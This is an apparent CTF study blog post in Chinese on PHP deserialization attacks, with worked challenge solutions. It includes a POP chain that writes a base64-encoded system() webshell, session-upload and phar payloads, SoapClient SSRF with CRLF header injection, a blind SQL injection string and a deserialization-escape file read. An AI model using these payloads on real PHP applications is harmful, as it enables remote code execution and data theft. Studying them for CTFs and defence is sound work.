php反序列化的千层套路

作为最好的语言的旗舰款漏洞，php反序列化在国内CTF基本有百分百的出场率。不过我基本没做过几道，总结一下顺便做几个题。
反序列化的本质就是注入一个对象然后调用它的某些方法，反序列化过程是只能传递变量不能传递方法的，所以需要程序本身定义了这个对象的这些方法。
最基础的就是利用魔术方法，比较复古的利用方法。

__construct() 当一个对象创建时被调用
__destruct() 当一个对象销毁时被调用
__toString() 当一个对象被当作一个字符串使用时被调用
__sleep() 在对象被序列化之前运行
__wakeup() 在对象被反序列化之前被调用
__call() 在对象上下文中调用不可访问的方法时触发
__callStatic() 在静态上下文中调用不可访问的方法时触发
__get() 用于从不可访问的属性读取数据
__set() 用于将数据写入不可访问的属性
__isset() 在不可访问的属性上调用isset()或empty()触发
__unset() 在不可访问的属性上使用unset()时触发
__invoke() 当脚本尝试将对象调用为函数时触发

一个常见套路是绕过wakeup方法(CVE-2016-7124)，当低版本(PHP5<5.6.25、PHP7<7.0.10)序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过wakeup的执行。比如把

O:9:"Twosmil1e":1:{s:3:"key";s:8:"twosmi1e";} 
改为
O:9:"Twosmil1e":2:{s:3:"key";s:8:"twosmi1e";}

一般是利用不同类同名方法来调用，寻找pop链，主要是细心。
看一道例题，eis2019的ezpop

<?php
error_reporting(0);

class A {

    protected $store;

    protected $key;

    protected $expire;

    public function __construct($store, $key = 'flysystem', $expire = null) {
        $this->key = $key;
        $this->store = $store;
        $this->expire = $expire;
    }

    public function cleanContents(array $contents) {
        $cachedProperties = array_flip([
            'path', 'dirname', 'basename', 'extension', 'filename',
            'size', 'mimetype', 'visibility', 'timestamp', 'type',
        ]);

        foreach ($contents as $path => $object) {
            if (is_array($object)) {
                $contents[$path] = array_intersect_key($object, $cachedProperties);
            }
        }

        return $contents;
    }

    public function getForStorage() {
        $cleaned = $this->cleanContents($this->cache);

        return json_encode([$cleaned, $this->complete]);
    }

    public function save() {
        $contents = $this->getForStorage();

        $this->store->set($this->key, $contents, $this->expire);
    }

    public function __destruct() {
        if (!$this->autosave) {
            $this->save();
        }
    }
}

class B {

    protected function getExpireTime($expire): int {
        return (int) $expire;
    }

    public function getCacheKey(string $name): string {
        return $this->options['prefix'] . $name;
    }

    protected function serialize($data): string {
        if (is_numeric($data)) {
            return (string) $data;
        }

        $serialize = $this->options['serialize'];

        return $serialize($data);
    }

    public function set($name, $value, $expire = null): bool{
        $this->writeTimes++;

        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }

        $expire = $this->getExpireTime($expire);
        $filename = $this->getCacheKey($name);

        $dir = dirname($filename);

        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // 创建失败
            }
        }

        $data = $this->serialize($value);

        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            //数据压缩
            $data = gzcompress($data, 3);
        }

        $data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
        $result = file_put_contents($filename, $data);

        if ($result) {
            return true;
        }

        return false;
    }

}

if (isset($_GET['src']))
{
    highlight_file(__FILE__);
}

$dir = "uploads/";

if (!is_dir($dir))
{
    mkdir($dir);
}
unserialize($_GET["data"]);

首先找一个切入点，给出了两个类，而这两个类具有同名函数set，并且set中有写文件操作，很明显就是利用这个函数。set是在A类析构的时候由A类的save函数调用。接下来看set的参数，第一个和第三个是可以直接设置的。第二个参数来自getForStorage函数。getForStorage函数又调用了cleanContents。A类的过程就整理清楚了。
然后b类就按照函数需要缺啥补啥，为了省事serialize选择一个不做改变的函数(strval)。最后看到有个死亡exit，利用伪协议作为前缀base64编码绕过，如果不能正确解码就添加1-4个字符满足base64的条件即可。
最后payload

$b = new B();
$b -> options = array("serialize"=>"strval","prefix"=>"php://filter/write=convert.base64-decode/resource=./uploads/","expire"=>"321"); 
$a = new A($b,"a.php");
$a -> cache = array("a"=>"reasdfPD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOz8+");

echo urlencode(serialize($a));

总之就是注意最后的利用点(文件写入/读取、命令执行)以及同名函数。
另一类是session反序列化，利用session不同的存储格式，php格式和php_serialize格式混合起来用导致漏洞。具体方法就是在php_serialize格式存储的文件传入单竖线(|)+恶意对象的序列化字符串，然后访问使用php格式处理session的文件，session_start函数会进行反序列化引入恶意对象。
当然利用这种方法肯定需要控制session值，除了直接$_SESSION[‘session’] = $_GET[‘session’]这种方法，还可以利用session的upload_process参数，没有显式的赋值但会存储传入的值作为session的键值。
例题是javisoj的phpinfo，很经典

<?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
    public $mdzz;
    function __construct()
    {
        $this->mdzz = 'phpinfo();';
    }
    
    function __destruct()
    {
        eval($this->mdzz);
    }
}
if(isset($_GET['phpinfo']))
{
    $m = new OowoO();
}
else
{
    highlight_string(file_get_contents('index.php'));
}
?>

看上去没有传参的地方，但php页面是可以上传数据的，参考https://skysec.top/2018/04/04/amazing-phpinfo/#session-upload-progress
弄一个上传页面，name要和phpinfo中的session.upload_progress.name相同

<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
    <input type="file" name="file" />
    <input type="submit" />
</form>

抓包修改上传的filename或者UPLOAD_PROGRESS的内容为|O:5:"OowoO":1:{s:4:"mdzz";s:34:"var_dump(glob(dirname(FILE)));";}这种格式就可以执行代码。这题直接glob(‘*’)的话是在根目录，所以要利用dirname(FILE)找一下web目录的位置。
接下来就是最网红的phar反序列化，可能是最近两年最火的php漏洞。特点就是不依赖unserialize，通过上传phar文件通过某些函数触发反序列化。这种隐式方式和session反序列化有些类似。利用方法就是生成一个phar文件并通过某些方法触发反序列化：

<?php
    class TestObject {
    }
    $phar = new Phar("phar.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub('GIF89a'."<?php __HALT_COMPILER(); ?>"); //设置stub，可以添加文件头绕过检测
    $o = new TestObject();
    $o -> data='xxxxxx';
    $phar->setMetadata($o); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();
?>
<?php
class TestObject{
    function __destruct()
    {
        echo $this -> data;   // TODO: Implement __destruct() method.
    }
}
include('phar://phar.phar');
?>

大概列举下可以触发phar反序列化的函数

fileatime / filectime / filemtime
stat / fileinode / fileowner / filegroup / fileperms
file / file_get_contents / readfile / fopen`
file_exists / is_dir / is_executable / is_file / is_link / is_readable / is_writeable / is_writable
parse_ini_file
unlink
copy
exif_thumbnail
exif_imagetype
mime_content_type
imageloadfont
imagecreatefrom***
hash_hmac_file
hash_file
hash_update_file
md5_file
sha1_file
get_meta_tags
get_headers
getimagesize
getimagesizefromstring

反正传个文件进去的都有可能
绕过过滤的方法：

$z = 'compress.bzip2://phar:///home/sx/test.phar/test.txt';
$z = 'compress.zlib://phar:///home/sx/test.phar/test.txt';
php://filter/read=convert.base64-encode/resource=phar://phar.phar
php://filter/resource=phar://phar.phar

例题就是之前写过的bytecms的ezcms，利用Zip内置类的同名open方法。
说到内置类，还有一个很经典的就是Soap类的call魔法方法实现ssrf，

<?php
$a = new SoapClient(null,array('uri'=>'bbb', 'location'=>'http://127.0.0.1:5555/path'));
$b = serialize($a);
echo $b;
$c = unserialize($b);
$c->not_exists_function();

运行后本地5555端口收到请求

POST /path HTTP/1.1
Host: 127.0.0.1:5555
Connection: Keep-Alive
User-Agent: PHP-SOAP/5.5.12
Content-Type: text/xml; charset=utf-8
SOAPAction: "bbb#not_exists_function"
Content-Length: 382

<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="bbb" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:not_exists_function/></SOAP-ENV:Body></SOAP-ENV:Envelope>

从数据包看到SOAPAction是可控的，存在CRLF注入，但是这里不能修改content-type，所以并不能利用。利用方式是修改user-agent，来自wupco

<?php
$target = 'http://127.0.0.1:5555/path';
$post_string = 'data=something';
$headers = array(
    'X-Forwarded-For: 127.0.0.1',
    'Cookie: PHPSESSID=my_session'
    );
$b = new SoapClient(null,array('location' => $target,'user_agent'=>'wupco^^Content-Type: application/x-www-form-urlencoded^^'.join('^^',$headers).'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri'      => "aaab"));

$aaa = serialize($b);
$aaa = str_replace('^^',"\r\n",$aaa);
$aaa = str_replace('&','&',$aaa);
echo $aaa;

$c = unserialize($aaa);
$c->not_exists_function();
?>

这样就有了一个post的ssrf
例题是N1CTF2018的easy_harder_php
第一步是注入，有几处sql都是直接拼接字符串的，虽然有个全局的addslashes转义了单引号，但是在insert中把重音符号转化成了单引号

private function get_column($columns){

        if(is_array($columns))
            $column = ' `'.implode('`,`',$columns).'` ';
        else
            $column = ' `'.$columns.'` ';

        return $column;
    }
public function insert($columns,$table,$values){

        $column = $this->get_column($columns);
        $value = '('.preg_replace('/`([^`,]+)`/','\'${1}\'',$this->get_column($values)).')';
        $nid =
        $sql = 'insert into '.$table.'('.$column.') values '.$value;
        $result = $this->conn->query($sql);

        return $result;
    }

所以可以拼接绕过，一共是三列，可控点在第二列，所以使用aaa`,if(ascii(substr((select password from ctf_users where username=0x61646d696e),%d,1))=%d,sleep(3),0))#这种就可以时间盲注，得到密码nu1ladmin
然后才是反序列化部分，showmess类存在反序列化

function showmess()
    {
        if(!$this->check_login()) return false;
        if($this->is_admin == 0)
        {
            //id,sig,mood,ip,country,subtime
            $db = new Db();
            @$ret = $db->select(array('username','signature','mood','id'),'ctf_user_signature',"userid = $this->userid order by id desc");
            if($ret) {
                $data = array();
                while ($row = $ret->fetch_row()) {
                    $sig = $row[1];
                    $mood = unserialize($row[2]);
                    $country = $mood->getcountry();
                    $ip = $mood->ip;
                    $subtime = $mood->getsubtime();
                    $allmess = array('id'=>$row[3],'sig' => $sig, 'mood' => $mood, 'ip' => $ip, 'country' => $country, 'subtime' => $subtime);
                    array_push($data, $allmess);
                }
                $data = json_encode(array('code'=>0,'data'=>$data));
                return $data;
            }
            else
                return false;

        }
        else
        {
            $filenames = scandir('adminpic/');
            array_splice($filenames, 0, 2);
            return json_encode(array('code'=>1,'data'=>$filenames));

        }
    }

所以注入一个Soap类调用其不存在的getcountry函数时就会触发call方法实现ssrf。就用上边的脚本最后bin2hex一下就行了。

还有种题型是反序列化逃逸，一般是通过preg_replace之类添加或去除了一些内容，导致反序列化结果发生变化。

 <?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
} 

问题出在filter(serialize($_SESSION))这里，修改了序列化后的值导致逃逸。$_SESSION可以利用变量覆盖控制，控制了img就可以读任意文件了。

<?php
$_SESSION["user"]='flagflagflagflagflagflag';
$_SESSION["function"]='a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}';
$_SESSION["img"]='L2QwZzNfZmxsbGxsbGFn';
var_dump(serialize($_SESSION));
//a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
去掉flag之后变成
a:3:{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
unsrialize(上边这行)
array(3) {
  'user' =>
  string(24) "";s:8:"function";s:59:"a"
  'img' =>
  string(20) "ZDBnM19mMWFnLnBocA=="
  'dd' =>
  string(1) "a"
}

这样就把s:59给划到前面的字符串里了，img属性就逃了出来，原本的img属性被挤到大括号后面不会执行。至于为什么加dd那个属性，因为原来数组有三项，改过还得是三个，不然会报错。
后记
写完了感觉好水，不水又没有东西写，只能水水维持生活。越来越感觉CTF是个无底洞，需要的广度大于深度，还是把精力放在挖洞吧，成果比较快。

参考链接
https://skysec.top/2019/07/18/Summary-of-serialization-attacks-Part-3/
https://blog.zsxsoft.com/post/38
https://xz.aliyun.com/t/6699